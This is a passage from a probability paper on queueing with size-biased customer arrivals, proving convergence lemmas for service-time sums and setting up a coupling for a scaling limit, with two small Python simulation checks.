We have the almost sure bound
\begin{align}%
\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}} &= \frac{1}{\sum_{j\in[n]}S_j^{\alpha} - \sum_{j\in\served{k-1}}S_j^{\alpha}} \notag\\
& \leq \frac{1}{\sum_{j\in[n]}S_j^{\alpha} - \sum_{j=1}^{k-1}S_{(n-j+1)}^{\alpha}} = \frac{1}{\sum_{j=1}^{n-k+1}S_{(j)}^{\alpha}},
\end{align}%
where $S_{(1)}^{\alpha}\leq S_{(2)}^{\alpha}\leq\ldots\leq S_{(n)}^{\alpha}$ denote the order statistics of the finite sequence $(S_i^{\alpha})_{i\in[n]}$.
There exists $p\in(0,1)$ such that $n-k+1\geq p n$, for large enough $n$. Consequently,
\begin{equation}%
\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}} \leq \frac{1}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}},
\end{equation}%
so that we have
\begin{equation}%
\E_{\sss S}[f(S_{c(k)})] \leq \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}.
\end{equation}%
Let us denote by $\xi_p$ the $p$-th quantile of the distribution $F_{\scriptscriptstyle S}(\cdot)$ and let us assume, without loss of generality, that $f_{\scriptscriptstyle S}(\xi_p) > 0$.
Note that $S_{(\lfloor np\rfloor)} = F_{n, \scriptscriptstyle S}^{-1}(\lfloor np \rfloor/n)$, where $F_{n,\scriptscriptstyle S}(t) = \sum_{i=1}^n\mathds 1_{\{S_i\leq t\}}/n$ is the empirical distribution function of the $(S_i)_{i=1}^n$, and $\xi_p = F_{\scriptscriptstyle S}^{-1}(p)$. Indeed, the assumption $f_{\scriptscriptstyle S}(\xi_p)>0$ implies that $F_{\scriptscriptstyle S}(\cdot)$ is invertible in a neighborhood of $\xi_p$.
We have that, as $n\rightarrow\infty$,
\begin{equation}%
S_{(\lfloor np\rfloor)}\sr{\mathrm{a.s.}}{\rightarrow} \xi_p.
\end{equation}%
In particular, as $n\rightarrow\infty$,
\begin{equation}%
\frac{1}{n}\Big\vert \sum_{j\in[n]} S_j^{\alpha} \mathds 1_{\{S_j\leq \xi_p\}} - \sum_{j\in[n]}S_j^{\alpha}\mathds 1_{\{S_j\leq S_{(\lfloor pn\rfloor)}\}} \Big\vert\sr{\mathrm{a.s.}}{\rightarrow} 0.
\end{equation}%
Therefore, by the strong Law of Large Numbers, as $n\rightarrow\infty$,
\begin{equation}%
\frac{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}{n}\sr{\mathrm{a.s.}}{\rightarrow} \mathbb E[S^{\alpha}\mathds 1_{\{S\leq \xi_p\}}].
\end{equation}%
Then, choosing $C_{f,\scriptscriptstyle S} = \mathbb E[f(S)S^{\alpha}]/\mathbb E[S^{\alpha}\mathds 1_{\{S\leq \xi_p\}}] + \varepsilon$, for an arbitrary $\varepsilon>0$, gives the desired result.
\end{proof}
If $\alpha >0$, as is the case in our setting, the proof of Lemma \ref{lem:expectation_service_times_ordering} shows that, uniformly in $k=O(n^{2/3})$,
\begin{align}
\E_{\sss S}[f(S_{c(k)})]&\leq \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}\notag\\
&= \frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}}{\sum_{j=1}^{n}S_{(j)}^{\alpha}}\Big(1 + \frac{\sum_{j=\lfloor pn\rfloor+1}^{n}S_{(j)}^{\alpha}}{\sum_{j=1}^{\lfloor pn\rfloor}S_{(j)}^{\alpha}}\Big),
\end{align}
and therefore
\begin{equation}\label{eq:average_first_customer_service_time_is_larger}%
\E_{\sss S}[f(S_{c(k)})]\leq \E_{\sss S}[f(S_{c(1)})](1+O_{\PS}(1)).
\end{equation}%
If $f(\cdot)$ is an increasing function, \eqref{eq:average_first_customer_service_time_is_larger} makes precise the intuition that, if $\alpha>0$, customers with larger job sizes join the queue earlier. We will often make use of the expression \eqref{eq:average_first_customer_service_time_is_larger}.
The following lemma will often prove useful in dealing with sums over a random index set:
\begin{lemma}[Uniform convergence of random sums]\label{lem:unif_convergence_random_sums}%
Let $(S_j)_{j=1}^{n}$ be a sequence of positive i.i.d.~random variables such that $\mathbb E[S^{2+\alpha}] < + \infty$, for $\alpha\in(0,1)$. Then,
\begin{equation}%
\sup_{\substack{\mathcal X\subseteq[n]\\ \vert \mathcal X \vert = O_{\mathbb P} (n^{2/3})}}\frac{1}{n}\sum_{j\in \mathcal X}S_j^{\alpha} = o_{\mathbb P}(1).
\end{equation}%
\end{lemma}%
\begin{proof}%
By Lemma \ref{lem:max_iid_random_variables}, $\max_{j\in[n]} S_j^{\alpha} = o_{\mathbb P}(n^{\alpha/(2+\alpha)})$. This gives
\begin{align}%
\sup_{\substack{\mathcal X\subseteq[n]\\ \vert \mathcal X \vert = O_{\mathbb P} (n^{2/3})}}\frac{1}{n}\sum_{j\in \mathcal X}S_j^{\alpha} \leq \frac{\max_{j\in[n]}S_j^{\alpha}}{n^{1/3}}O_{\mathbb P}(1) = o_{\mathbb P} (n^{\frac{\alpha-2/3-\alpha/3}{2+\alpha}}) = o_{\mathbb P}(n^{\frac{2}{3}\frac{\alpha-1}{2+\alpha}}).
\end{align}%
Since $\alpha-1 \leq 0$ by assumption, the claim is proven.
\end{proof}%
We now focus on the $i$-th customer joining the queue (for $i$ large) and characterize the distribution of its service time. In particular, for $\alpha>0$ this distribution differs from that of $S_i$.
\begin{lemma}[Size-biased distribution of the service times]\label{lem:size_biased_distribution}%
For every bounded, real-valued continuous function $f(\cdot)$, as $n\rightarrow\infty$,
\begin{equation}\label{eq:size_biased_distribution}%
\E_{\sss S}[f(S_{c(i)})\mid \mathcal F _{i-1}]\sr{\mathbb P}{\rightarrow}\frac{\mathbb E[f(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]},
\end{equation}%
uniformly for $i=O_{\PS}(n^{2/3})$. Moreover, as $n\rightarrow\infty$,
\begin{equation}%
\E_{\sss S}[f(S_{c(i)})]\rightarrow\frac{\mathbb E[f(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]},\qquad \mathrm{for}~i=O_{\PS}(n^{2/3}).
\end{equation}%
\end{lemma}%
\begin{proof}
First note that
\begin{align}
\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}] &= \sum_{j\notin \served{i-1}}f(S_j)\mathbb P_{\sss S}(c(i) = j \mid\mathcal F_{i-1}) = \sum_{j\notin \served{i-1}}\frac{f(S_j)S_j^{\alpha}}{\sum_{l\notin \served{i-1}}S_l^{\alpha}}.
\end{align}
This can be further decomposed as
\begin{equation}%
\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}] = \frac{\sum_{j=1}^nf(S_j)S_j^{\alpha} - \sum_{j\in\served{i-1}}f(S_j)S_j^{\alpha}}{\sum_{l=1}^nS_l^{\alpha} - \sum_{l\in\served{i-1}}S_l^{\alpha}}.
\end{equation}%
Since $\vert\served{i-1}\vert = i-1$ and $i = O_{\mathbb P}(n^{2/3})$, by the Law of Large Numbers and Lemma \ref{lem:unif_convergence_random_sums},
\begin{align}%
\frac{\sum_{j\notin\served{i-1}}f(S_j)S_j^{\alpha}}{n}\sr{\mathbb P}{\rightarrow} \mathbb E[f(S)S^{\alpha}],\quad\frac{\sum_{l\notin\served{i-1}}S_l^{\alpha}}{n}\sr{\mathbb P}{\rightarrow} \mathbb E[S^{\alpha}],
\end{align}%
uniformly in $i = O_{\mathbb P}(n^{2/3})$. This gives the first claim.
Furthermore, we bound $\E_{\sss S}[f(S_{c(i)})\mid \mathcal F_{i-1}]$ as
\begin{equation}%
\E_{\sss S}[f(S_{c(i)})\mid \mathcal F_{i-1}] = \sum_{j\notin \served{i-1}}\frac{f(S_j)S_j^{\alpha}}{\sum_{l\notin \served{i-1}}S_l^{\alpha}} \leq \sup_{x\geq0}f(x)<\infty.
\end{equation}%
Since $\E_{\sss S}[f(S_{c(i)})] = \E_{\sss S}[\E_{\sss S}[f(S_{c(i)}) \mid \mathcal F_{i-1}]]$, using \eqref{eq:size_biased_distribution} and the Dominated Convergence \mbox{Theorem} the second claim follows.
\end{proof}
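The limit in Lemma \ref{lem:size_biased_distribution} can likewise be estimated by simulation. For mean-one exponential services, $\alpha=1$ and $f(x)=x$ (unbounded, but with all relevant moments finite here), the right-hand side of \eqref{eq:size_biased_distribution} equals $\mathbb E[S^{2}]/\mathbb E[S]=2$. A minimal sketch in which the first customer to arrive is drawn directly as a size-biased pick from an i.i.d.~sample (sample sizes are arbitrary choices):

```python
import random

rng = random.Random(42)
n, trials, alpha = 500, 2000, 1.0
total = 0.0
for _ in range(trials):
    S = [rng.expovariate(1.0) for _ in range(n)]
    # by Lemma lem:size_biased_reordering, c(1) is an alpha-size-biased pick
    total += rng.choices(S, weights=[s ** alpha for s in S])[0]
est = total / trials
# target: E[S^(1+alpha)] / E[S^alpha] = Gamma(3)/Gamma(2) = 2 for exp(1)
assert abs(est - 2.0) < 0.2
```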
In Lemma \ref{lem:size_biased_distribution} we have studied the distribution of the service time of the $i$-th customer, and we now focus on its (conditional) moments. The following lemma should be interpreted as follows: Because of the size-biased re-ordering of the customer arrivals, the service time of the $i$-th customer being served (for $i$ large) is highly concentrated.
\begin{lemma}\label{lem:1+alphaConditionalMoment}%
For any fixed $\gamma\in[-1,1]$,
\begin{equation}\label{eq:1+alphaConditionalMoment}%
\E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] = \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]} + o_{\mathbb P}(1)\quad\mathrm{for}~i = O_{\PS}(n^{2/3}),
\end{equation}%
where the error term is uniform in $i= O_{\mathbb P_{\sss S}}(n^{2/3})$.
Moreover, the convergence holds in $L^1$, i.e.
\begin{equation}\label{eq:1+alphaConditionalMoment_L1_convergence}%
\E_{\sss S}\Big[\Big\vert\E_{\sss S}[ S_{c(i)}^{1+\gamma}\mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] = o_{\mathbb P}(1),
\end{equation}%
uniformly in $i=O_{\PS}(n^{2/3})$.
\end{lemma}%
\begin{proof}
In order to apply Lemma \ref{lem:size_biased_distribution}, we first split
\begin{equation}%
S_{c(i)}^{1+\gamma} = (S_{c(i)}\wedge K)^{1+\gamma} + ((S_{c(i)} - K)^+)^{1+\gamma},
\end{equation}%
where $K>0$ is arbitrary, so that
\begin{equation}%
\E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] = \E_{\sss S}[(S_{c(i)}\wedge K)^{1+\gamma} \mid \mathcal F_{i-1}] + \E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma} \mid \mathcal F_{i-1}].
\end{equation}%
The first term is bounded, and therefore converges to $\mathbb E[(S\wedge K)^{1+\gamma}S^{\alpha}]/\mathbb E[S^{\alpha}]$ by Lemma \ref{lem:size_biased_distribution}.
The second term is bounded through Markov's inequality, as
\begin{equation}%
\mathbb P_{\sss S} (\E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma} \mid \mathcal F_{i-1}] \geq \varepsilon) \leq \frac{\E_{\sss S}[((S_{c(i)}-K)^+)^{1+\gamma}]}{\varepsilon}.
\end{equation}%
Next we apply Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = f_{\scriptscriptstyle K}(x) =((x-K)^+)^{1+\gamma}$,
\begin{equation}\label{eq:1+alpha_error_term_bound}%
\E_{\sss S}[((S_{c(i)}-K)^+)^{1+\gamma}] \leq C_{f_{\scriptscriptstyle K},\scriptscriptstyle S}.
\end{equation}%
Therefore,
\begin{align}\label{eq:1+alpha_error_term_bound_second}%
\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert &\leq \Big\vert\E_{\sss S}[(S_{c(i)}\wedge K)^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert + C_{f_{\scriptscriptstyle K},\scriptscriptstyle S}.
\end{align}%
The proof of Lemma \ref{lem:expectation_service_times_ordering} shows that $\limsup_{K\rightarrow\infty}C_{f_{\scriptscriptstyle K},\scriptscriptstyle S} \leq \varepsilon$ for any $\varepsilon>0$, and thus $\lim_{K\rightarrow\infty}C_{f_{\scriptscriptstyle K},\scriptscriptstyle S} = 0$. Therefore, by letting $K\rightarrow\infty$ in \eqref{eq:1+alpha_error_term_bound_second}, \eqref{eq:1+alphaConditionalMoment} follows. Next, we split
\begin{align}%
\E_{\sss S}\Big[\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] &\leq \E_{\sss S}\Big[\Big\vert(S_{c(i)}\wedge K)^{1+\gamma} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big]\notag\\
&\quad+\E_{\sss S}[((S_{c(i)} - K)^+)^{1+\gamma}].
\end{align}%
The second term can be bounded as in \eqref{eq:1+alpha_error_term_bound}. For the first term,
\begin{align}%
\E_{\sss S}&\Big[\Big\vert(S_{c(i)}\wedge K)^{1+\gamma} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] \leq \Big\vert\frac{\sum_{j=1}^n(S_{j}\wedge K)^{1+\gamma}S_j^{\alpha}}{\sum_{j=1}^n S_j^{\alpha}} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert \notag\\
&+\E_{\sss S}\Big[\Big\vert \frac{\sum_{j=1}^n(S_j\wedge K)^{1+\gamma}S_j^{\alpha}\sum_{l\in\served{i-1}}S_l^{\alpha} }{(\sum_{j=1}^nS_j^{\alpha})^2}\Big\vert\Big] + \E_{\sss S}\Big[\Big\vert\frac{\sum_{l=1}^n S_l^{\alpha}\sum_{j\in \served{i-1}}(S_j\wedge K)^{1+\gamma}S_j^{\alpha}}{(\sum_{j=1}^nS_j^{\alpha})^2} \Big\vert\Big],
\end{align}%
where we have used that $\vert(a-b)/(c-d) -a/c\vert\leq ad/c^2 + bc/c^2$, for positive $a$, $b$, $c$, $d$. The second and third terms converge uniformly over $i=O_{\mathbb P_{\sss S}}(n^{2/3})$ by Lemma \ref{lem:unif_convergence_random_sums}. Summarizing,
\begin{align}%
\E_{\sss S}\Big[\Big\vert \E_{\sss S}[S_{c(i)}^{1+\gamma} \mid \mathcal F_{i-1}] - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert\Big] &\leq \Big\vert\frac{\sum_{j=1}^n(S_{j}\wedge K)^{1+\gamma}S_j^{\alpha}}{\sum_{j=1}^n S_j^{\alpha}} - \frac{\mathbb E[S^{1+\gamma+\alpha}]}{\mathbb E[S^{\alpha}]}\Big\vert \notag\\
&\quad+ \frac{\sum_{l=1}^n((S_l-K)^+)^{1+\gamma}}{\sum_{j=1}^n S_j^{\alpha}} + o_{\mathbb P}(1).
\end{align}%
Letting first $n\rightarrow\infty$ and then $K\rightarrow\infty$, \eqref{eq:1+alphaConditionalMoment_L1_convergence} follows.
\end{proof}
We will make use of Lemma \ref{lem:1+alphaConditionalMoment} several times throughout the proof, with the specific choices $\gamma \in \{0,\alpha,1\}$. The following lemma is of central importance in the proof of the uniform convergence of the quadratic part of the drift:
\begin{lemma}\label{lem:size_biased_service_times_unif_convergence}%
As $n\rightarrow\infty$,
\begin{equation}\label{eq:size_biased_service_times_unif_convergence}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha} - \frac{\mathbb E[S^{1+2\alpha}]}{\mathbb E[S^{\alpha}]}\Big)\Big\vert \stackrel{\mathbb P}{\rightarrow} 0.
\end{equation}%
\end{lemma}%
\begin{proof}
By Lemma \ref{lem:1+alphaConditionalMoment}, \eqref{eq:size_biased_service_times_unif_convergence} is equivalent to
\begin{equation}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}- \mathbb E[S_{c(i)}^{1+\alpha}\mid \mathcal F_{i-1}]\Big)\Big\vert \stackrel{\mathbb P}{\rightarrow} 0.
\end{equation}%
We split the event space and separately bound
\begin{equation}\label{eq:size_biased_service_times_unif_convergence_smaller_Kn}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} - \mathbb E[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert
\end{equation}%
and
\begin{equation}\label{eq:size_biased_service_times_unif_convergence_greater_Kn}%
n^{-2/3}\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} - \mathbb E[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert,
\end{equation}%
for a sequence $(K_n)_{n\geq1}$ with $K_n\rightarrow\infty$, which we choose later on. We start with \eqref{eq:size_biased_service_times_unif_convergence_smaller_Kn}. Since the sum inside the absolute value is a martingale as a function of $j$, \eqref{eq:size_biased_service_times_unif_convergence_smaller_Kn} can be bounded through Doob's $L^p$ inequality \cite[Theorem 11.2]{klenke2008probability} with $p=2$ as
\begin{align}%
\mathbb P_{\sss S}\Big(\sup_{j\leq tn^{2/3}}&\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} - \E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert \geq\varepsilon n^{2/3}\Big) \notag\\
&\leq \frac{1}{\varepsilon^2 n^{4/3}}\E_{\sss S}\Big[\sum_{i=1}^{tn^{2/3}}(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} -\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}} \mid \mathcal F_{i-1}])^2\Big]\notag\\
&\leq \frac{2}{\varepsilon^2 n^{4/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)}^{2+2\alpha} \mathds 1_{\{S^{1+\alpha}_{c(i)}\leq K_n\}}] \leq \frac{2}{\varepsilon^2 n^{4/3}}\sum_{i=1}^{tn^{2/3}}K_n^{2\alpha}\E_{\sss S}[S_{c(i)}^{2}] .
\end{align}%
Lemma \ref{lem:1+alphaConditionalMoment} allows us to approximate $\E_{\sss S}[S_{c(i)}^{2}]$ uniformly by $\frac{\mathbb E[S^{2+\alpha}]}{\mathbb E[S^{\alpha}]}$. Thus, we get
\begin{align}%
\frac{2}{\varepsilon^2 n^{4/3}}\sum_{i=1}^{tn^{2/3}}\Big(K_n^{2\alpha}\frac{\mathbb E[S^{2+\alpha}]}{\mathbb E[ S^{\alpha}]} +o_{\mathbb P}(1)\Big) &= \frac{t K_n^{2\alpha}}{\varepsilon^2 n^{2/3}} O_{\mathbb P}(1),
\end{align}%
which converges to zero as $n\rightarrow\infty$ if and only if $K_n^{\alpha}/n^{1/3}$ does.
We now turn to \eqref{eq:size_biased_service_times_unif_convergence_greater_Kn} and apply Doob's $L^1$ martingale inequality \cite[Theorem 11.2]{klenke2008probability} to obtain
\begin{align}\label{eq:size_biased_service_times_unif_convergence_greater_Kn_second}%
&\mathbb P_{\sss S}\Big(\sup_{j\leq tn^{2/3}}\Big\vert \sum_{i=1}^{j}\Big(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} - \E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}]\Big)\Big\vert\geq\varepsilon n^{2/3}\Big) \notag\\
&\leq \frac{1}{\varepsilon n^{2/3}}\E_{\sss S}\Big[\Big\vert\sum_{i=1}^{tn^{2/3}}(S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} -\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} \mid \mathcal F_{i-1}])\Big\vert\Big]\notag\\
&\leq \frac{2}{\varepsilon n^{2/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(i)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(i)}> K_n\}} ] \leq \frac{2}{\varepsilon n^{2/3}}\sum_{i=1}^{tn^{2/3}}\E_{\sss S}[S_{c(1)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(1)}> K_n\}} ](1+O_{\PS}(1))\notag\\
& = \frac{2t}{\varepsilon}\E_{\sss S}[S_{c(1)}^{1+\alpha}\mathds 1_{\{S^{1+\alpha}_{c(1)}> K_n\}}](1+O_{\PS}(1))=o_{\mathbb P}(1).
\end{align}%
We have used Lemma \ref{lem:1+alphaConditionalMoment} in the second inequality, and Lemma \ref{lem:expectation_service_times_ordering} with $f(x) = x^{1+\alpha}\mathds 1_{\{x^{1+\alpha} > K_n\}}$ in the third. The right-most term in \eqref{eq:size_biased_service_times_unif_convergence_greater_Kn_second} is $o_{\mathbb P}(1)$ as $n\rightarrow\infty$ by the strong Law of Large Numbers. Note that this part of the bound does not impose additional conditions on $K_n$, so that, if we take $K_n= n^{c}$, it is sufficient that $0<c<\frac{1}{3\alpha}$, with the convention that $\frac{1}{0}=\infty$.
\end{proof}
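The statement of Lemma \ref{lem:size_biased_service_times_unif_convergence} can be explored numerically by generating the first $tn^{2/3}$ indices of the $\alpha$-size-biased ordering via sequential weighted sampling without replacement. A minimal sketch for exp(1) services, where the centering constant is computed as $\mathbb E[S^{1+2\alpha}]/\mathbb E[S^{\alpha}] = \Gamma(2+2\alpha)/\Gamma(1+\alpha)$; the loose bound in the final assertion is an illustration, not a quantitative claim:

```python
import bisect, itertools, math, random

def size_biased_prefix(S, alpha, k, rng):
    """First k indices of the alpha-size-biased ordering of S."""
    idx = list(range(len(S)))
    w = [S[i] ** alpha for i in idx]
    out = []
    for _ in range(k):
        cum = list(itertools.accumulate(w))            # cumulative weights
        j = bisect.bisect_left(cum, rng.random() * cum[-1])
        out.append(idx.pop(j))                         # remove chosen customer
        w.pop(j)
    return out

rng = random.Random(3)
alpha, n = 0.5, 5000
S = [rng.expovariate(1.0) for _ in range(n)]
k = int(n ** (2 / 3))                                  # corresponds to t = 1
order = size_biased_prefix(S, alpha, k, rng)
m = math.gamma(2 + 2 * alpha) / math.gamma(1 + alpha)  # E[S^(1+2a)]/E[S^a]
partial, sup = 0.0, 0.0
for i in order:
    partial += S[i] ** (1 + alpha) - m
    sup = max(sup, abs(partial))
assert sup / n ** (2 / 3) < 1.0   # the rescaled supremum is already small
```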
We conclude this section with a technical lemma concerning error terms in the computations of quadratic variations. Denote the density (resp.~distribution function) of a rate $\lambda$ exponential random variable by $f_{\scriptscriptstyle E}(\cdot)$ (resp.~$F_{\scriptscriptstyle E}(\cdot)$):
\begin{lemma}\label{lem:n_squared_err_term}%
We have
\begin{equation}\label{eq:n_squared_err_term_statement}%
\E_{\sss S}\Big[\sum_{h,q\in[n]}\Big\vert F_{\scriptscriptstyle E} \Big(\frac{S_{c(i)}S_h^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_h^{\alpha}}{n}\Big\vert \Big\vert F_{\scriptscriptstyle E} \Big( \frac{S_{c(i)}S_q^{\alpha}}{n}\Big) - \frac{\lambda S_{c(i)}S_q^{\alpha}}{n}\Big\vert \mid \mathcal F_{i-1}\Big] = o_{\mathbb P}(1)
\end{equation}%
uniformly in $i=O(n^{2/3})$.
\end{lemma}%
\begin{proof}%
Since $\vert F_{\scriptscriptstyle E} (x) - \lambda x\vert = O(x^2)$, the bound $\vert\lambda S_{c(i)}S_h^{\alpha}/n-F_{\scriptscriptstyle E}(S_{c(i)}S_h^{\alpha}/n)\vert \leq C(S_{c(i)}S_h^{\alpha}/n)^{1+\varepsilon}$ holds almost surely for any $0<\varepsilon<1$ and some constant $C>0$, which gives
\begin{align}%
C^2\sum_{h,q\in[n]}\E_{\sss S}\Big[\Big( \frac{S_{c(i)}S_h^{\alpha}}{n}\Big)^{1+\varepsilon} \Big( \frac{S_q^{\alpha}S_{c(i)}}{n}\Big)^{1+\varepsilon} \mid \mathcal F_{i-1}\Big]= \frac{C^2}{n^{2+2\varepsilon}}\sum_{h,q\in[n]} \E_{\sss S}[ S_{c(i)}^{2+2\varepsilon} \mid \mathcal F_{i-1}] S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)}.
\end{align}%
Therefore,
\begin{align}\label{eq:n_squared_err_term_final}%
C^2&\sum_{h,q\in[n]}\E_{\sss S}\Big[\Big( \frac{S_{c(i)}S_h^{\alpha}}{n}\Big)^{1+\varepsilon} \Big( \frac{S_q^{\alpha}S_{c(i)}}{n}\Big)^{1+\varepsilon}\mid \mathcal F_{i-1}\Big] \notag\\
&\leq \frac{C^2}{n^{2+2\varepsilon}}\max_{j\in[n]}S_j^{2\varepsilon}\E_{\sss S}[ S_{c(i)}^{2} \mid \mathcal F_{i-1}]\sum_{h,q\in[n]} S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)} \notag\\
&\leq \frac{C^2\,\mathbb E[S^{2+\alpha}]}{\mathbb E[S^{\alpha}]}\frac{\max_{j\in[n]}S_j^{2\varepsilon}}{n^{2\varepsilon}}\frac{1}{n^2}\sum_{h,q\in[n]} S_h^{\alpha(1+\varepsilon)} S_q^{\alpha(1+\varepsilon)} +o_{\mathbb P}(1),
\end{align}%
where in the last step we used Lemma \ref{lem:1+alphaConditionalMoment}. Note that, since $\mathbb E[S^{2+\alpha}]<\infty$, by Lemma \ref{lem:max_iid_random_variables} $\max_{j\in[n]}S_j^{2\varepsilon} = o_{\mathbb P}(n^{2\varepsilon/(2+\alpha)})$.
The right-most term in \eqref{eq:n_squared_err_term_final} then tends to zero as $n$ tends to infinity as long as $0<\varepsilon<\min\{1,2/\alpha\}$.
\end{proof}%
\section{Proving the scaling limit}\label{sec:proof_main_result}
We first establish some preliminary estimates on $N_n(\cdot)$ that will \bl{be} crucial for the proof of convergence. We will upper bound the process $N_n(\cdot)$ by a simpler process $N_n^{\scriptscriptstyle U}(\cdot)$ in such a way that the increments of $N_n^{\scriptscriptstyle U}(\cdot)$ almost surely dominate the increments of $N_n(\cdot)$. We also show that, after rescaling, $N_n^{\scriptscriptstyle U}(\cdot)$ converges in distribution to $W(\cdot)$. The process $N_n^{\scriptscriptstyle U}(\cdot)$ is defined as $N_n^{\scriptscriptstyle U}(0) = N_n(0)$, and
\begin{equation}\label{eq:pre_reflection_queue_length_process_upper_bound}%
N_n^{\scriptscriptstyle U}(k) = N_n^{\scriptscriptstyle U}(k-1) + A^{\scriptscriptstyle U}_n(k) -1,
\end{equation}%
where
\begin{equation}\label{eq:arrivals_upper_bound}%
A^{\scriptscriptstyle U}_n(k) = \sum_{i\notin\served{k}} \mathds 1 _{\{T_i \leq c_{n,\beta}S_{c(k)}/n\}},
\end{equation}%
with
\begin{equation}
c_{n,\beta}=1+\beta n^{-1/3},
\end{equation}%
and
\begin{equation}%
T_{i} \stackrel{\mathrm d}{=} \textrm{exp}_i(\lambda S_i^{\alpha}).
\end{equation}%
An interpretation of the process $N_n^{\scriptscriptstyle U}(\cdot)$ is that customers are not removed from the pool of potential customers until they have been served. Therefore, a customer could potentially join the queue more than once. We couple the processes $N_n(\cdot)$ and $N_n^{\scriptscriptstyle U}(\cdot)$ as follows. Consider a sequence of arrival times $(T_i)_{i=1}^{\infty}$ and of service times $(S_i)_{i=1}^{\infty}$, then define $A_n(\cdot)$ as \eqref{eq:number_arrivals_during_one_service} and $A_n^{\scriptscriptstyle U}(\cdot)$ as \eqref{eq:arrivals_upper_bound}. With this coupling we have that, almost surely,
\begin{equation}%
A_n(k) \leq A_n^{\scriptscriptstyle U}(k) \qquad \forall~k \geq 1.
\end{equation}%
Consequently,
\begin{equation}\label{eq:pre_reflection_process_domination}%
N_n (k) \leq N_n^{\scriptscriptstyle U}(k)\qquad\forall k\geq 0,
\end{equation}%
and
\begin{equation}\label{eq:reflected_process_domination}%
Q_n(k) = \phi(N_n) (k) \leq\phi(N_n^{\scriptscriptstyle U})(k) =: Q_n^{\scriptscriptstyle U}(k) \qquad\forall k\geq 0,
\end{equation}%
almost surely.
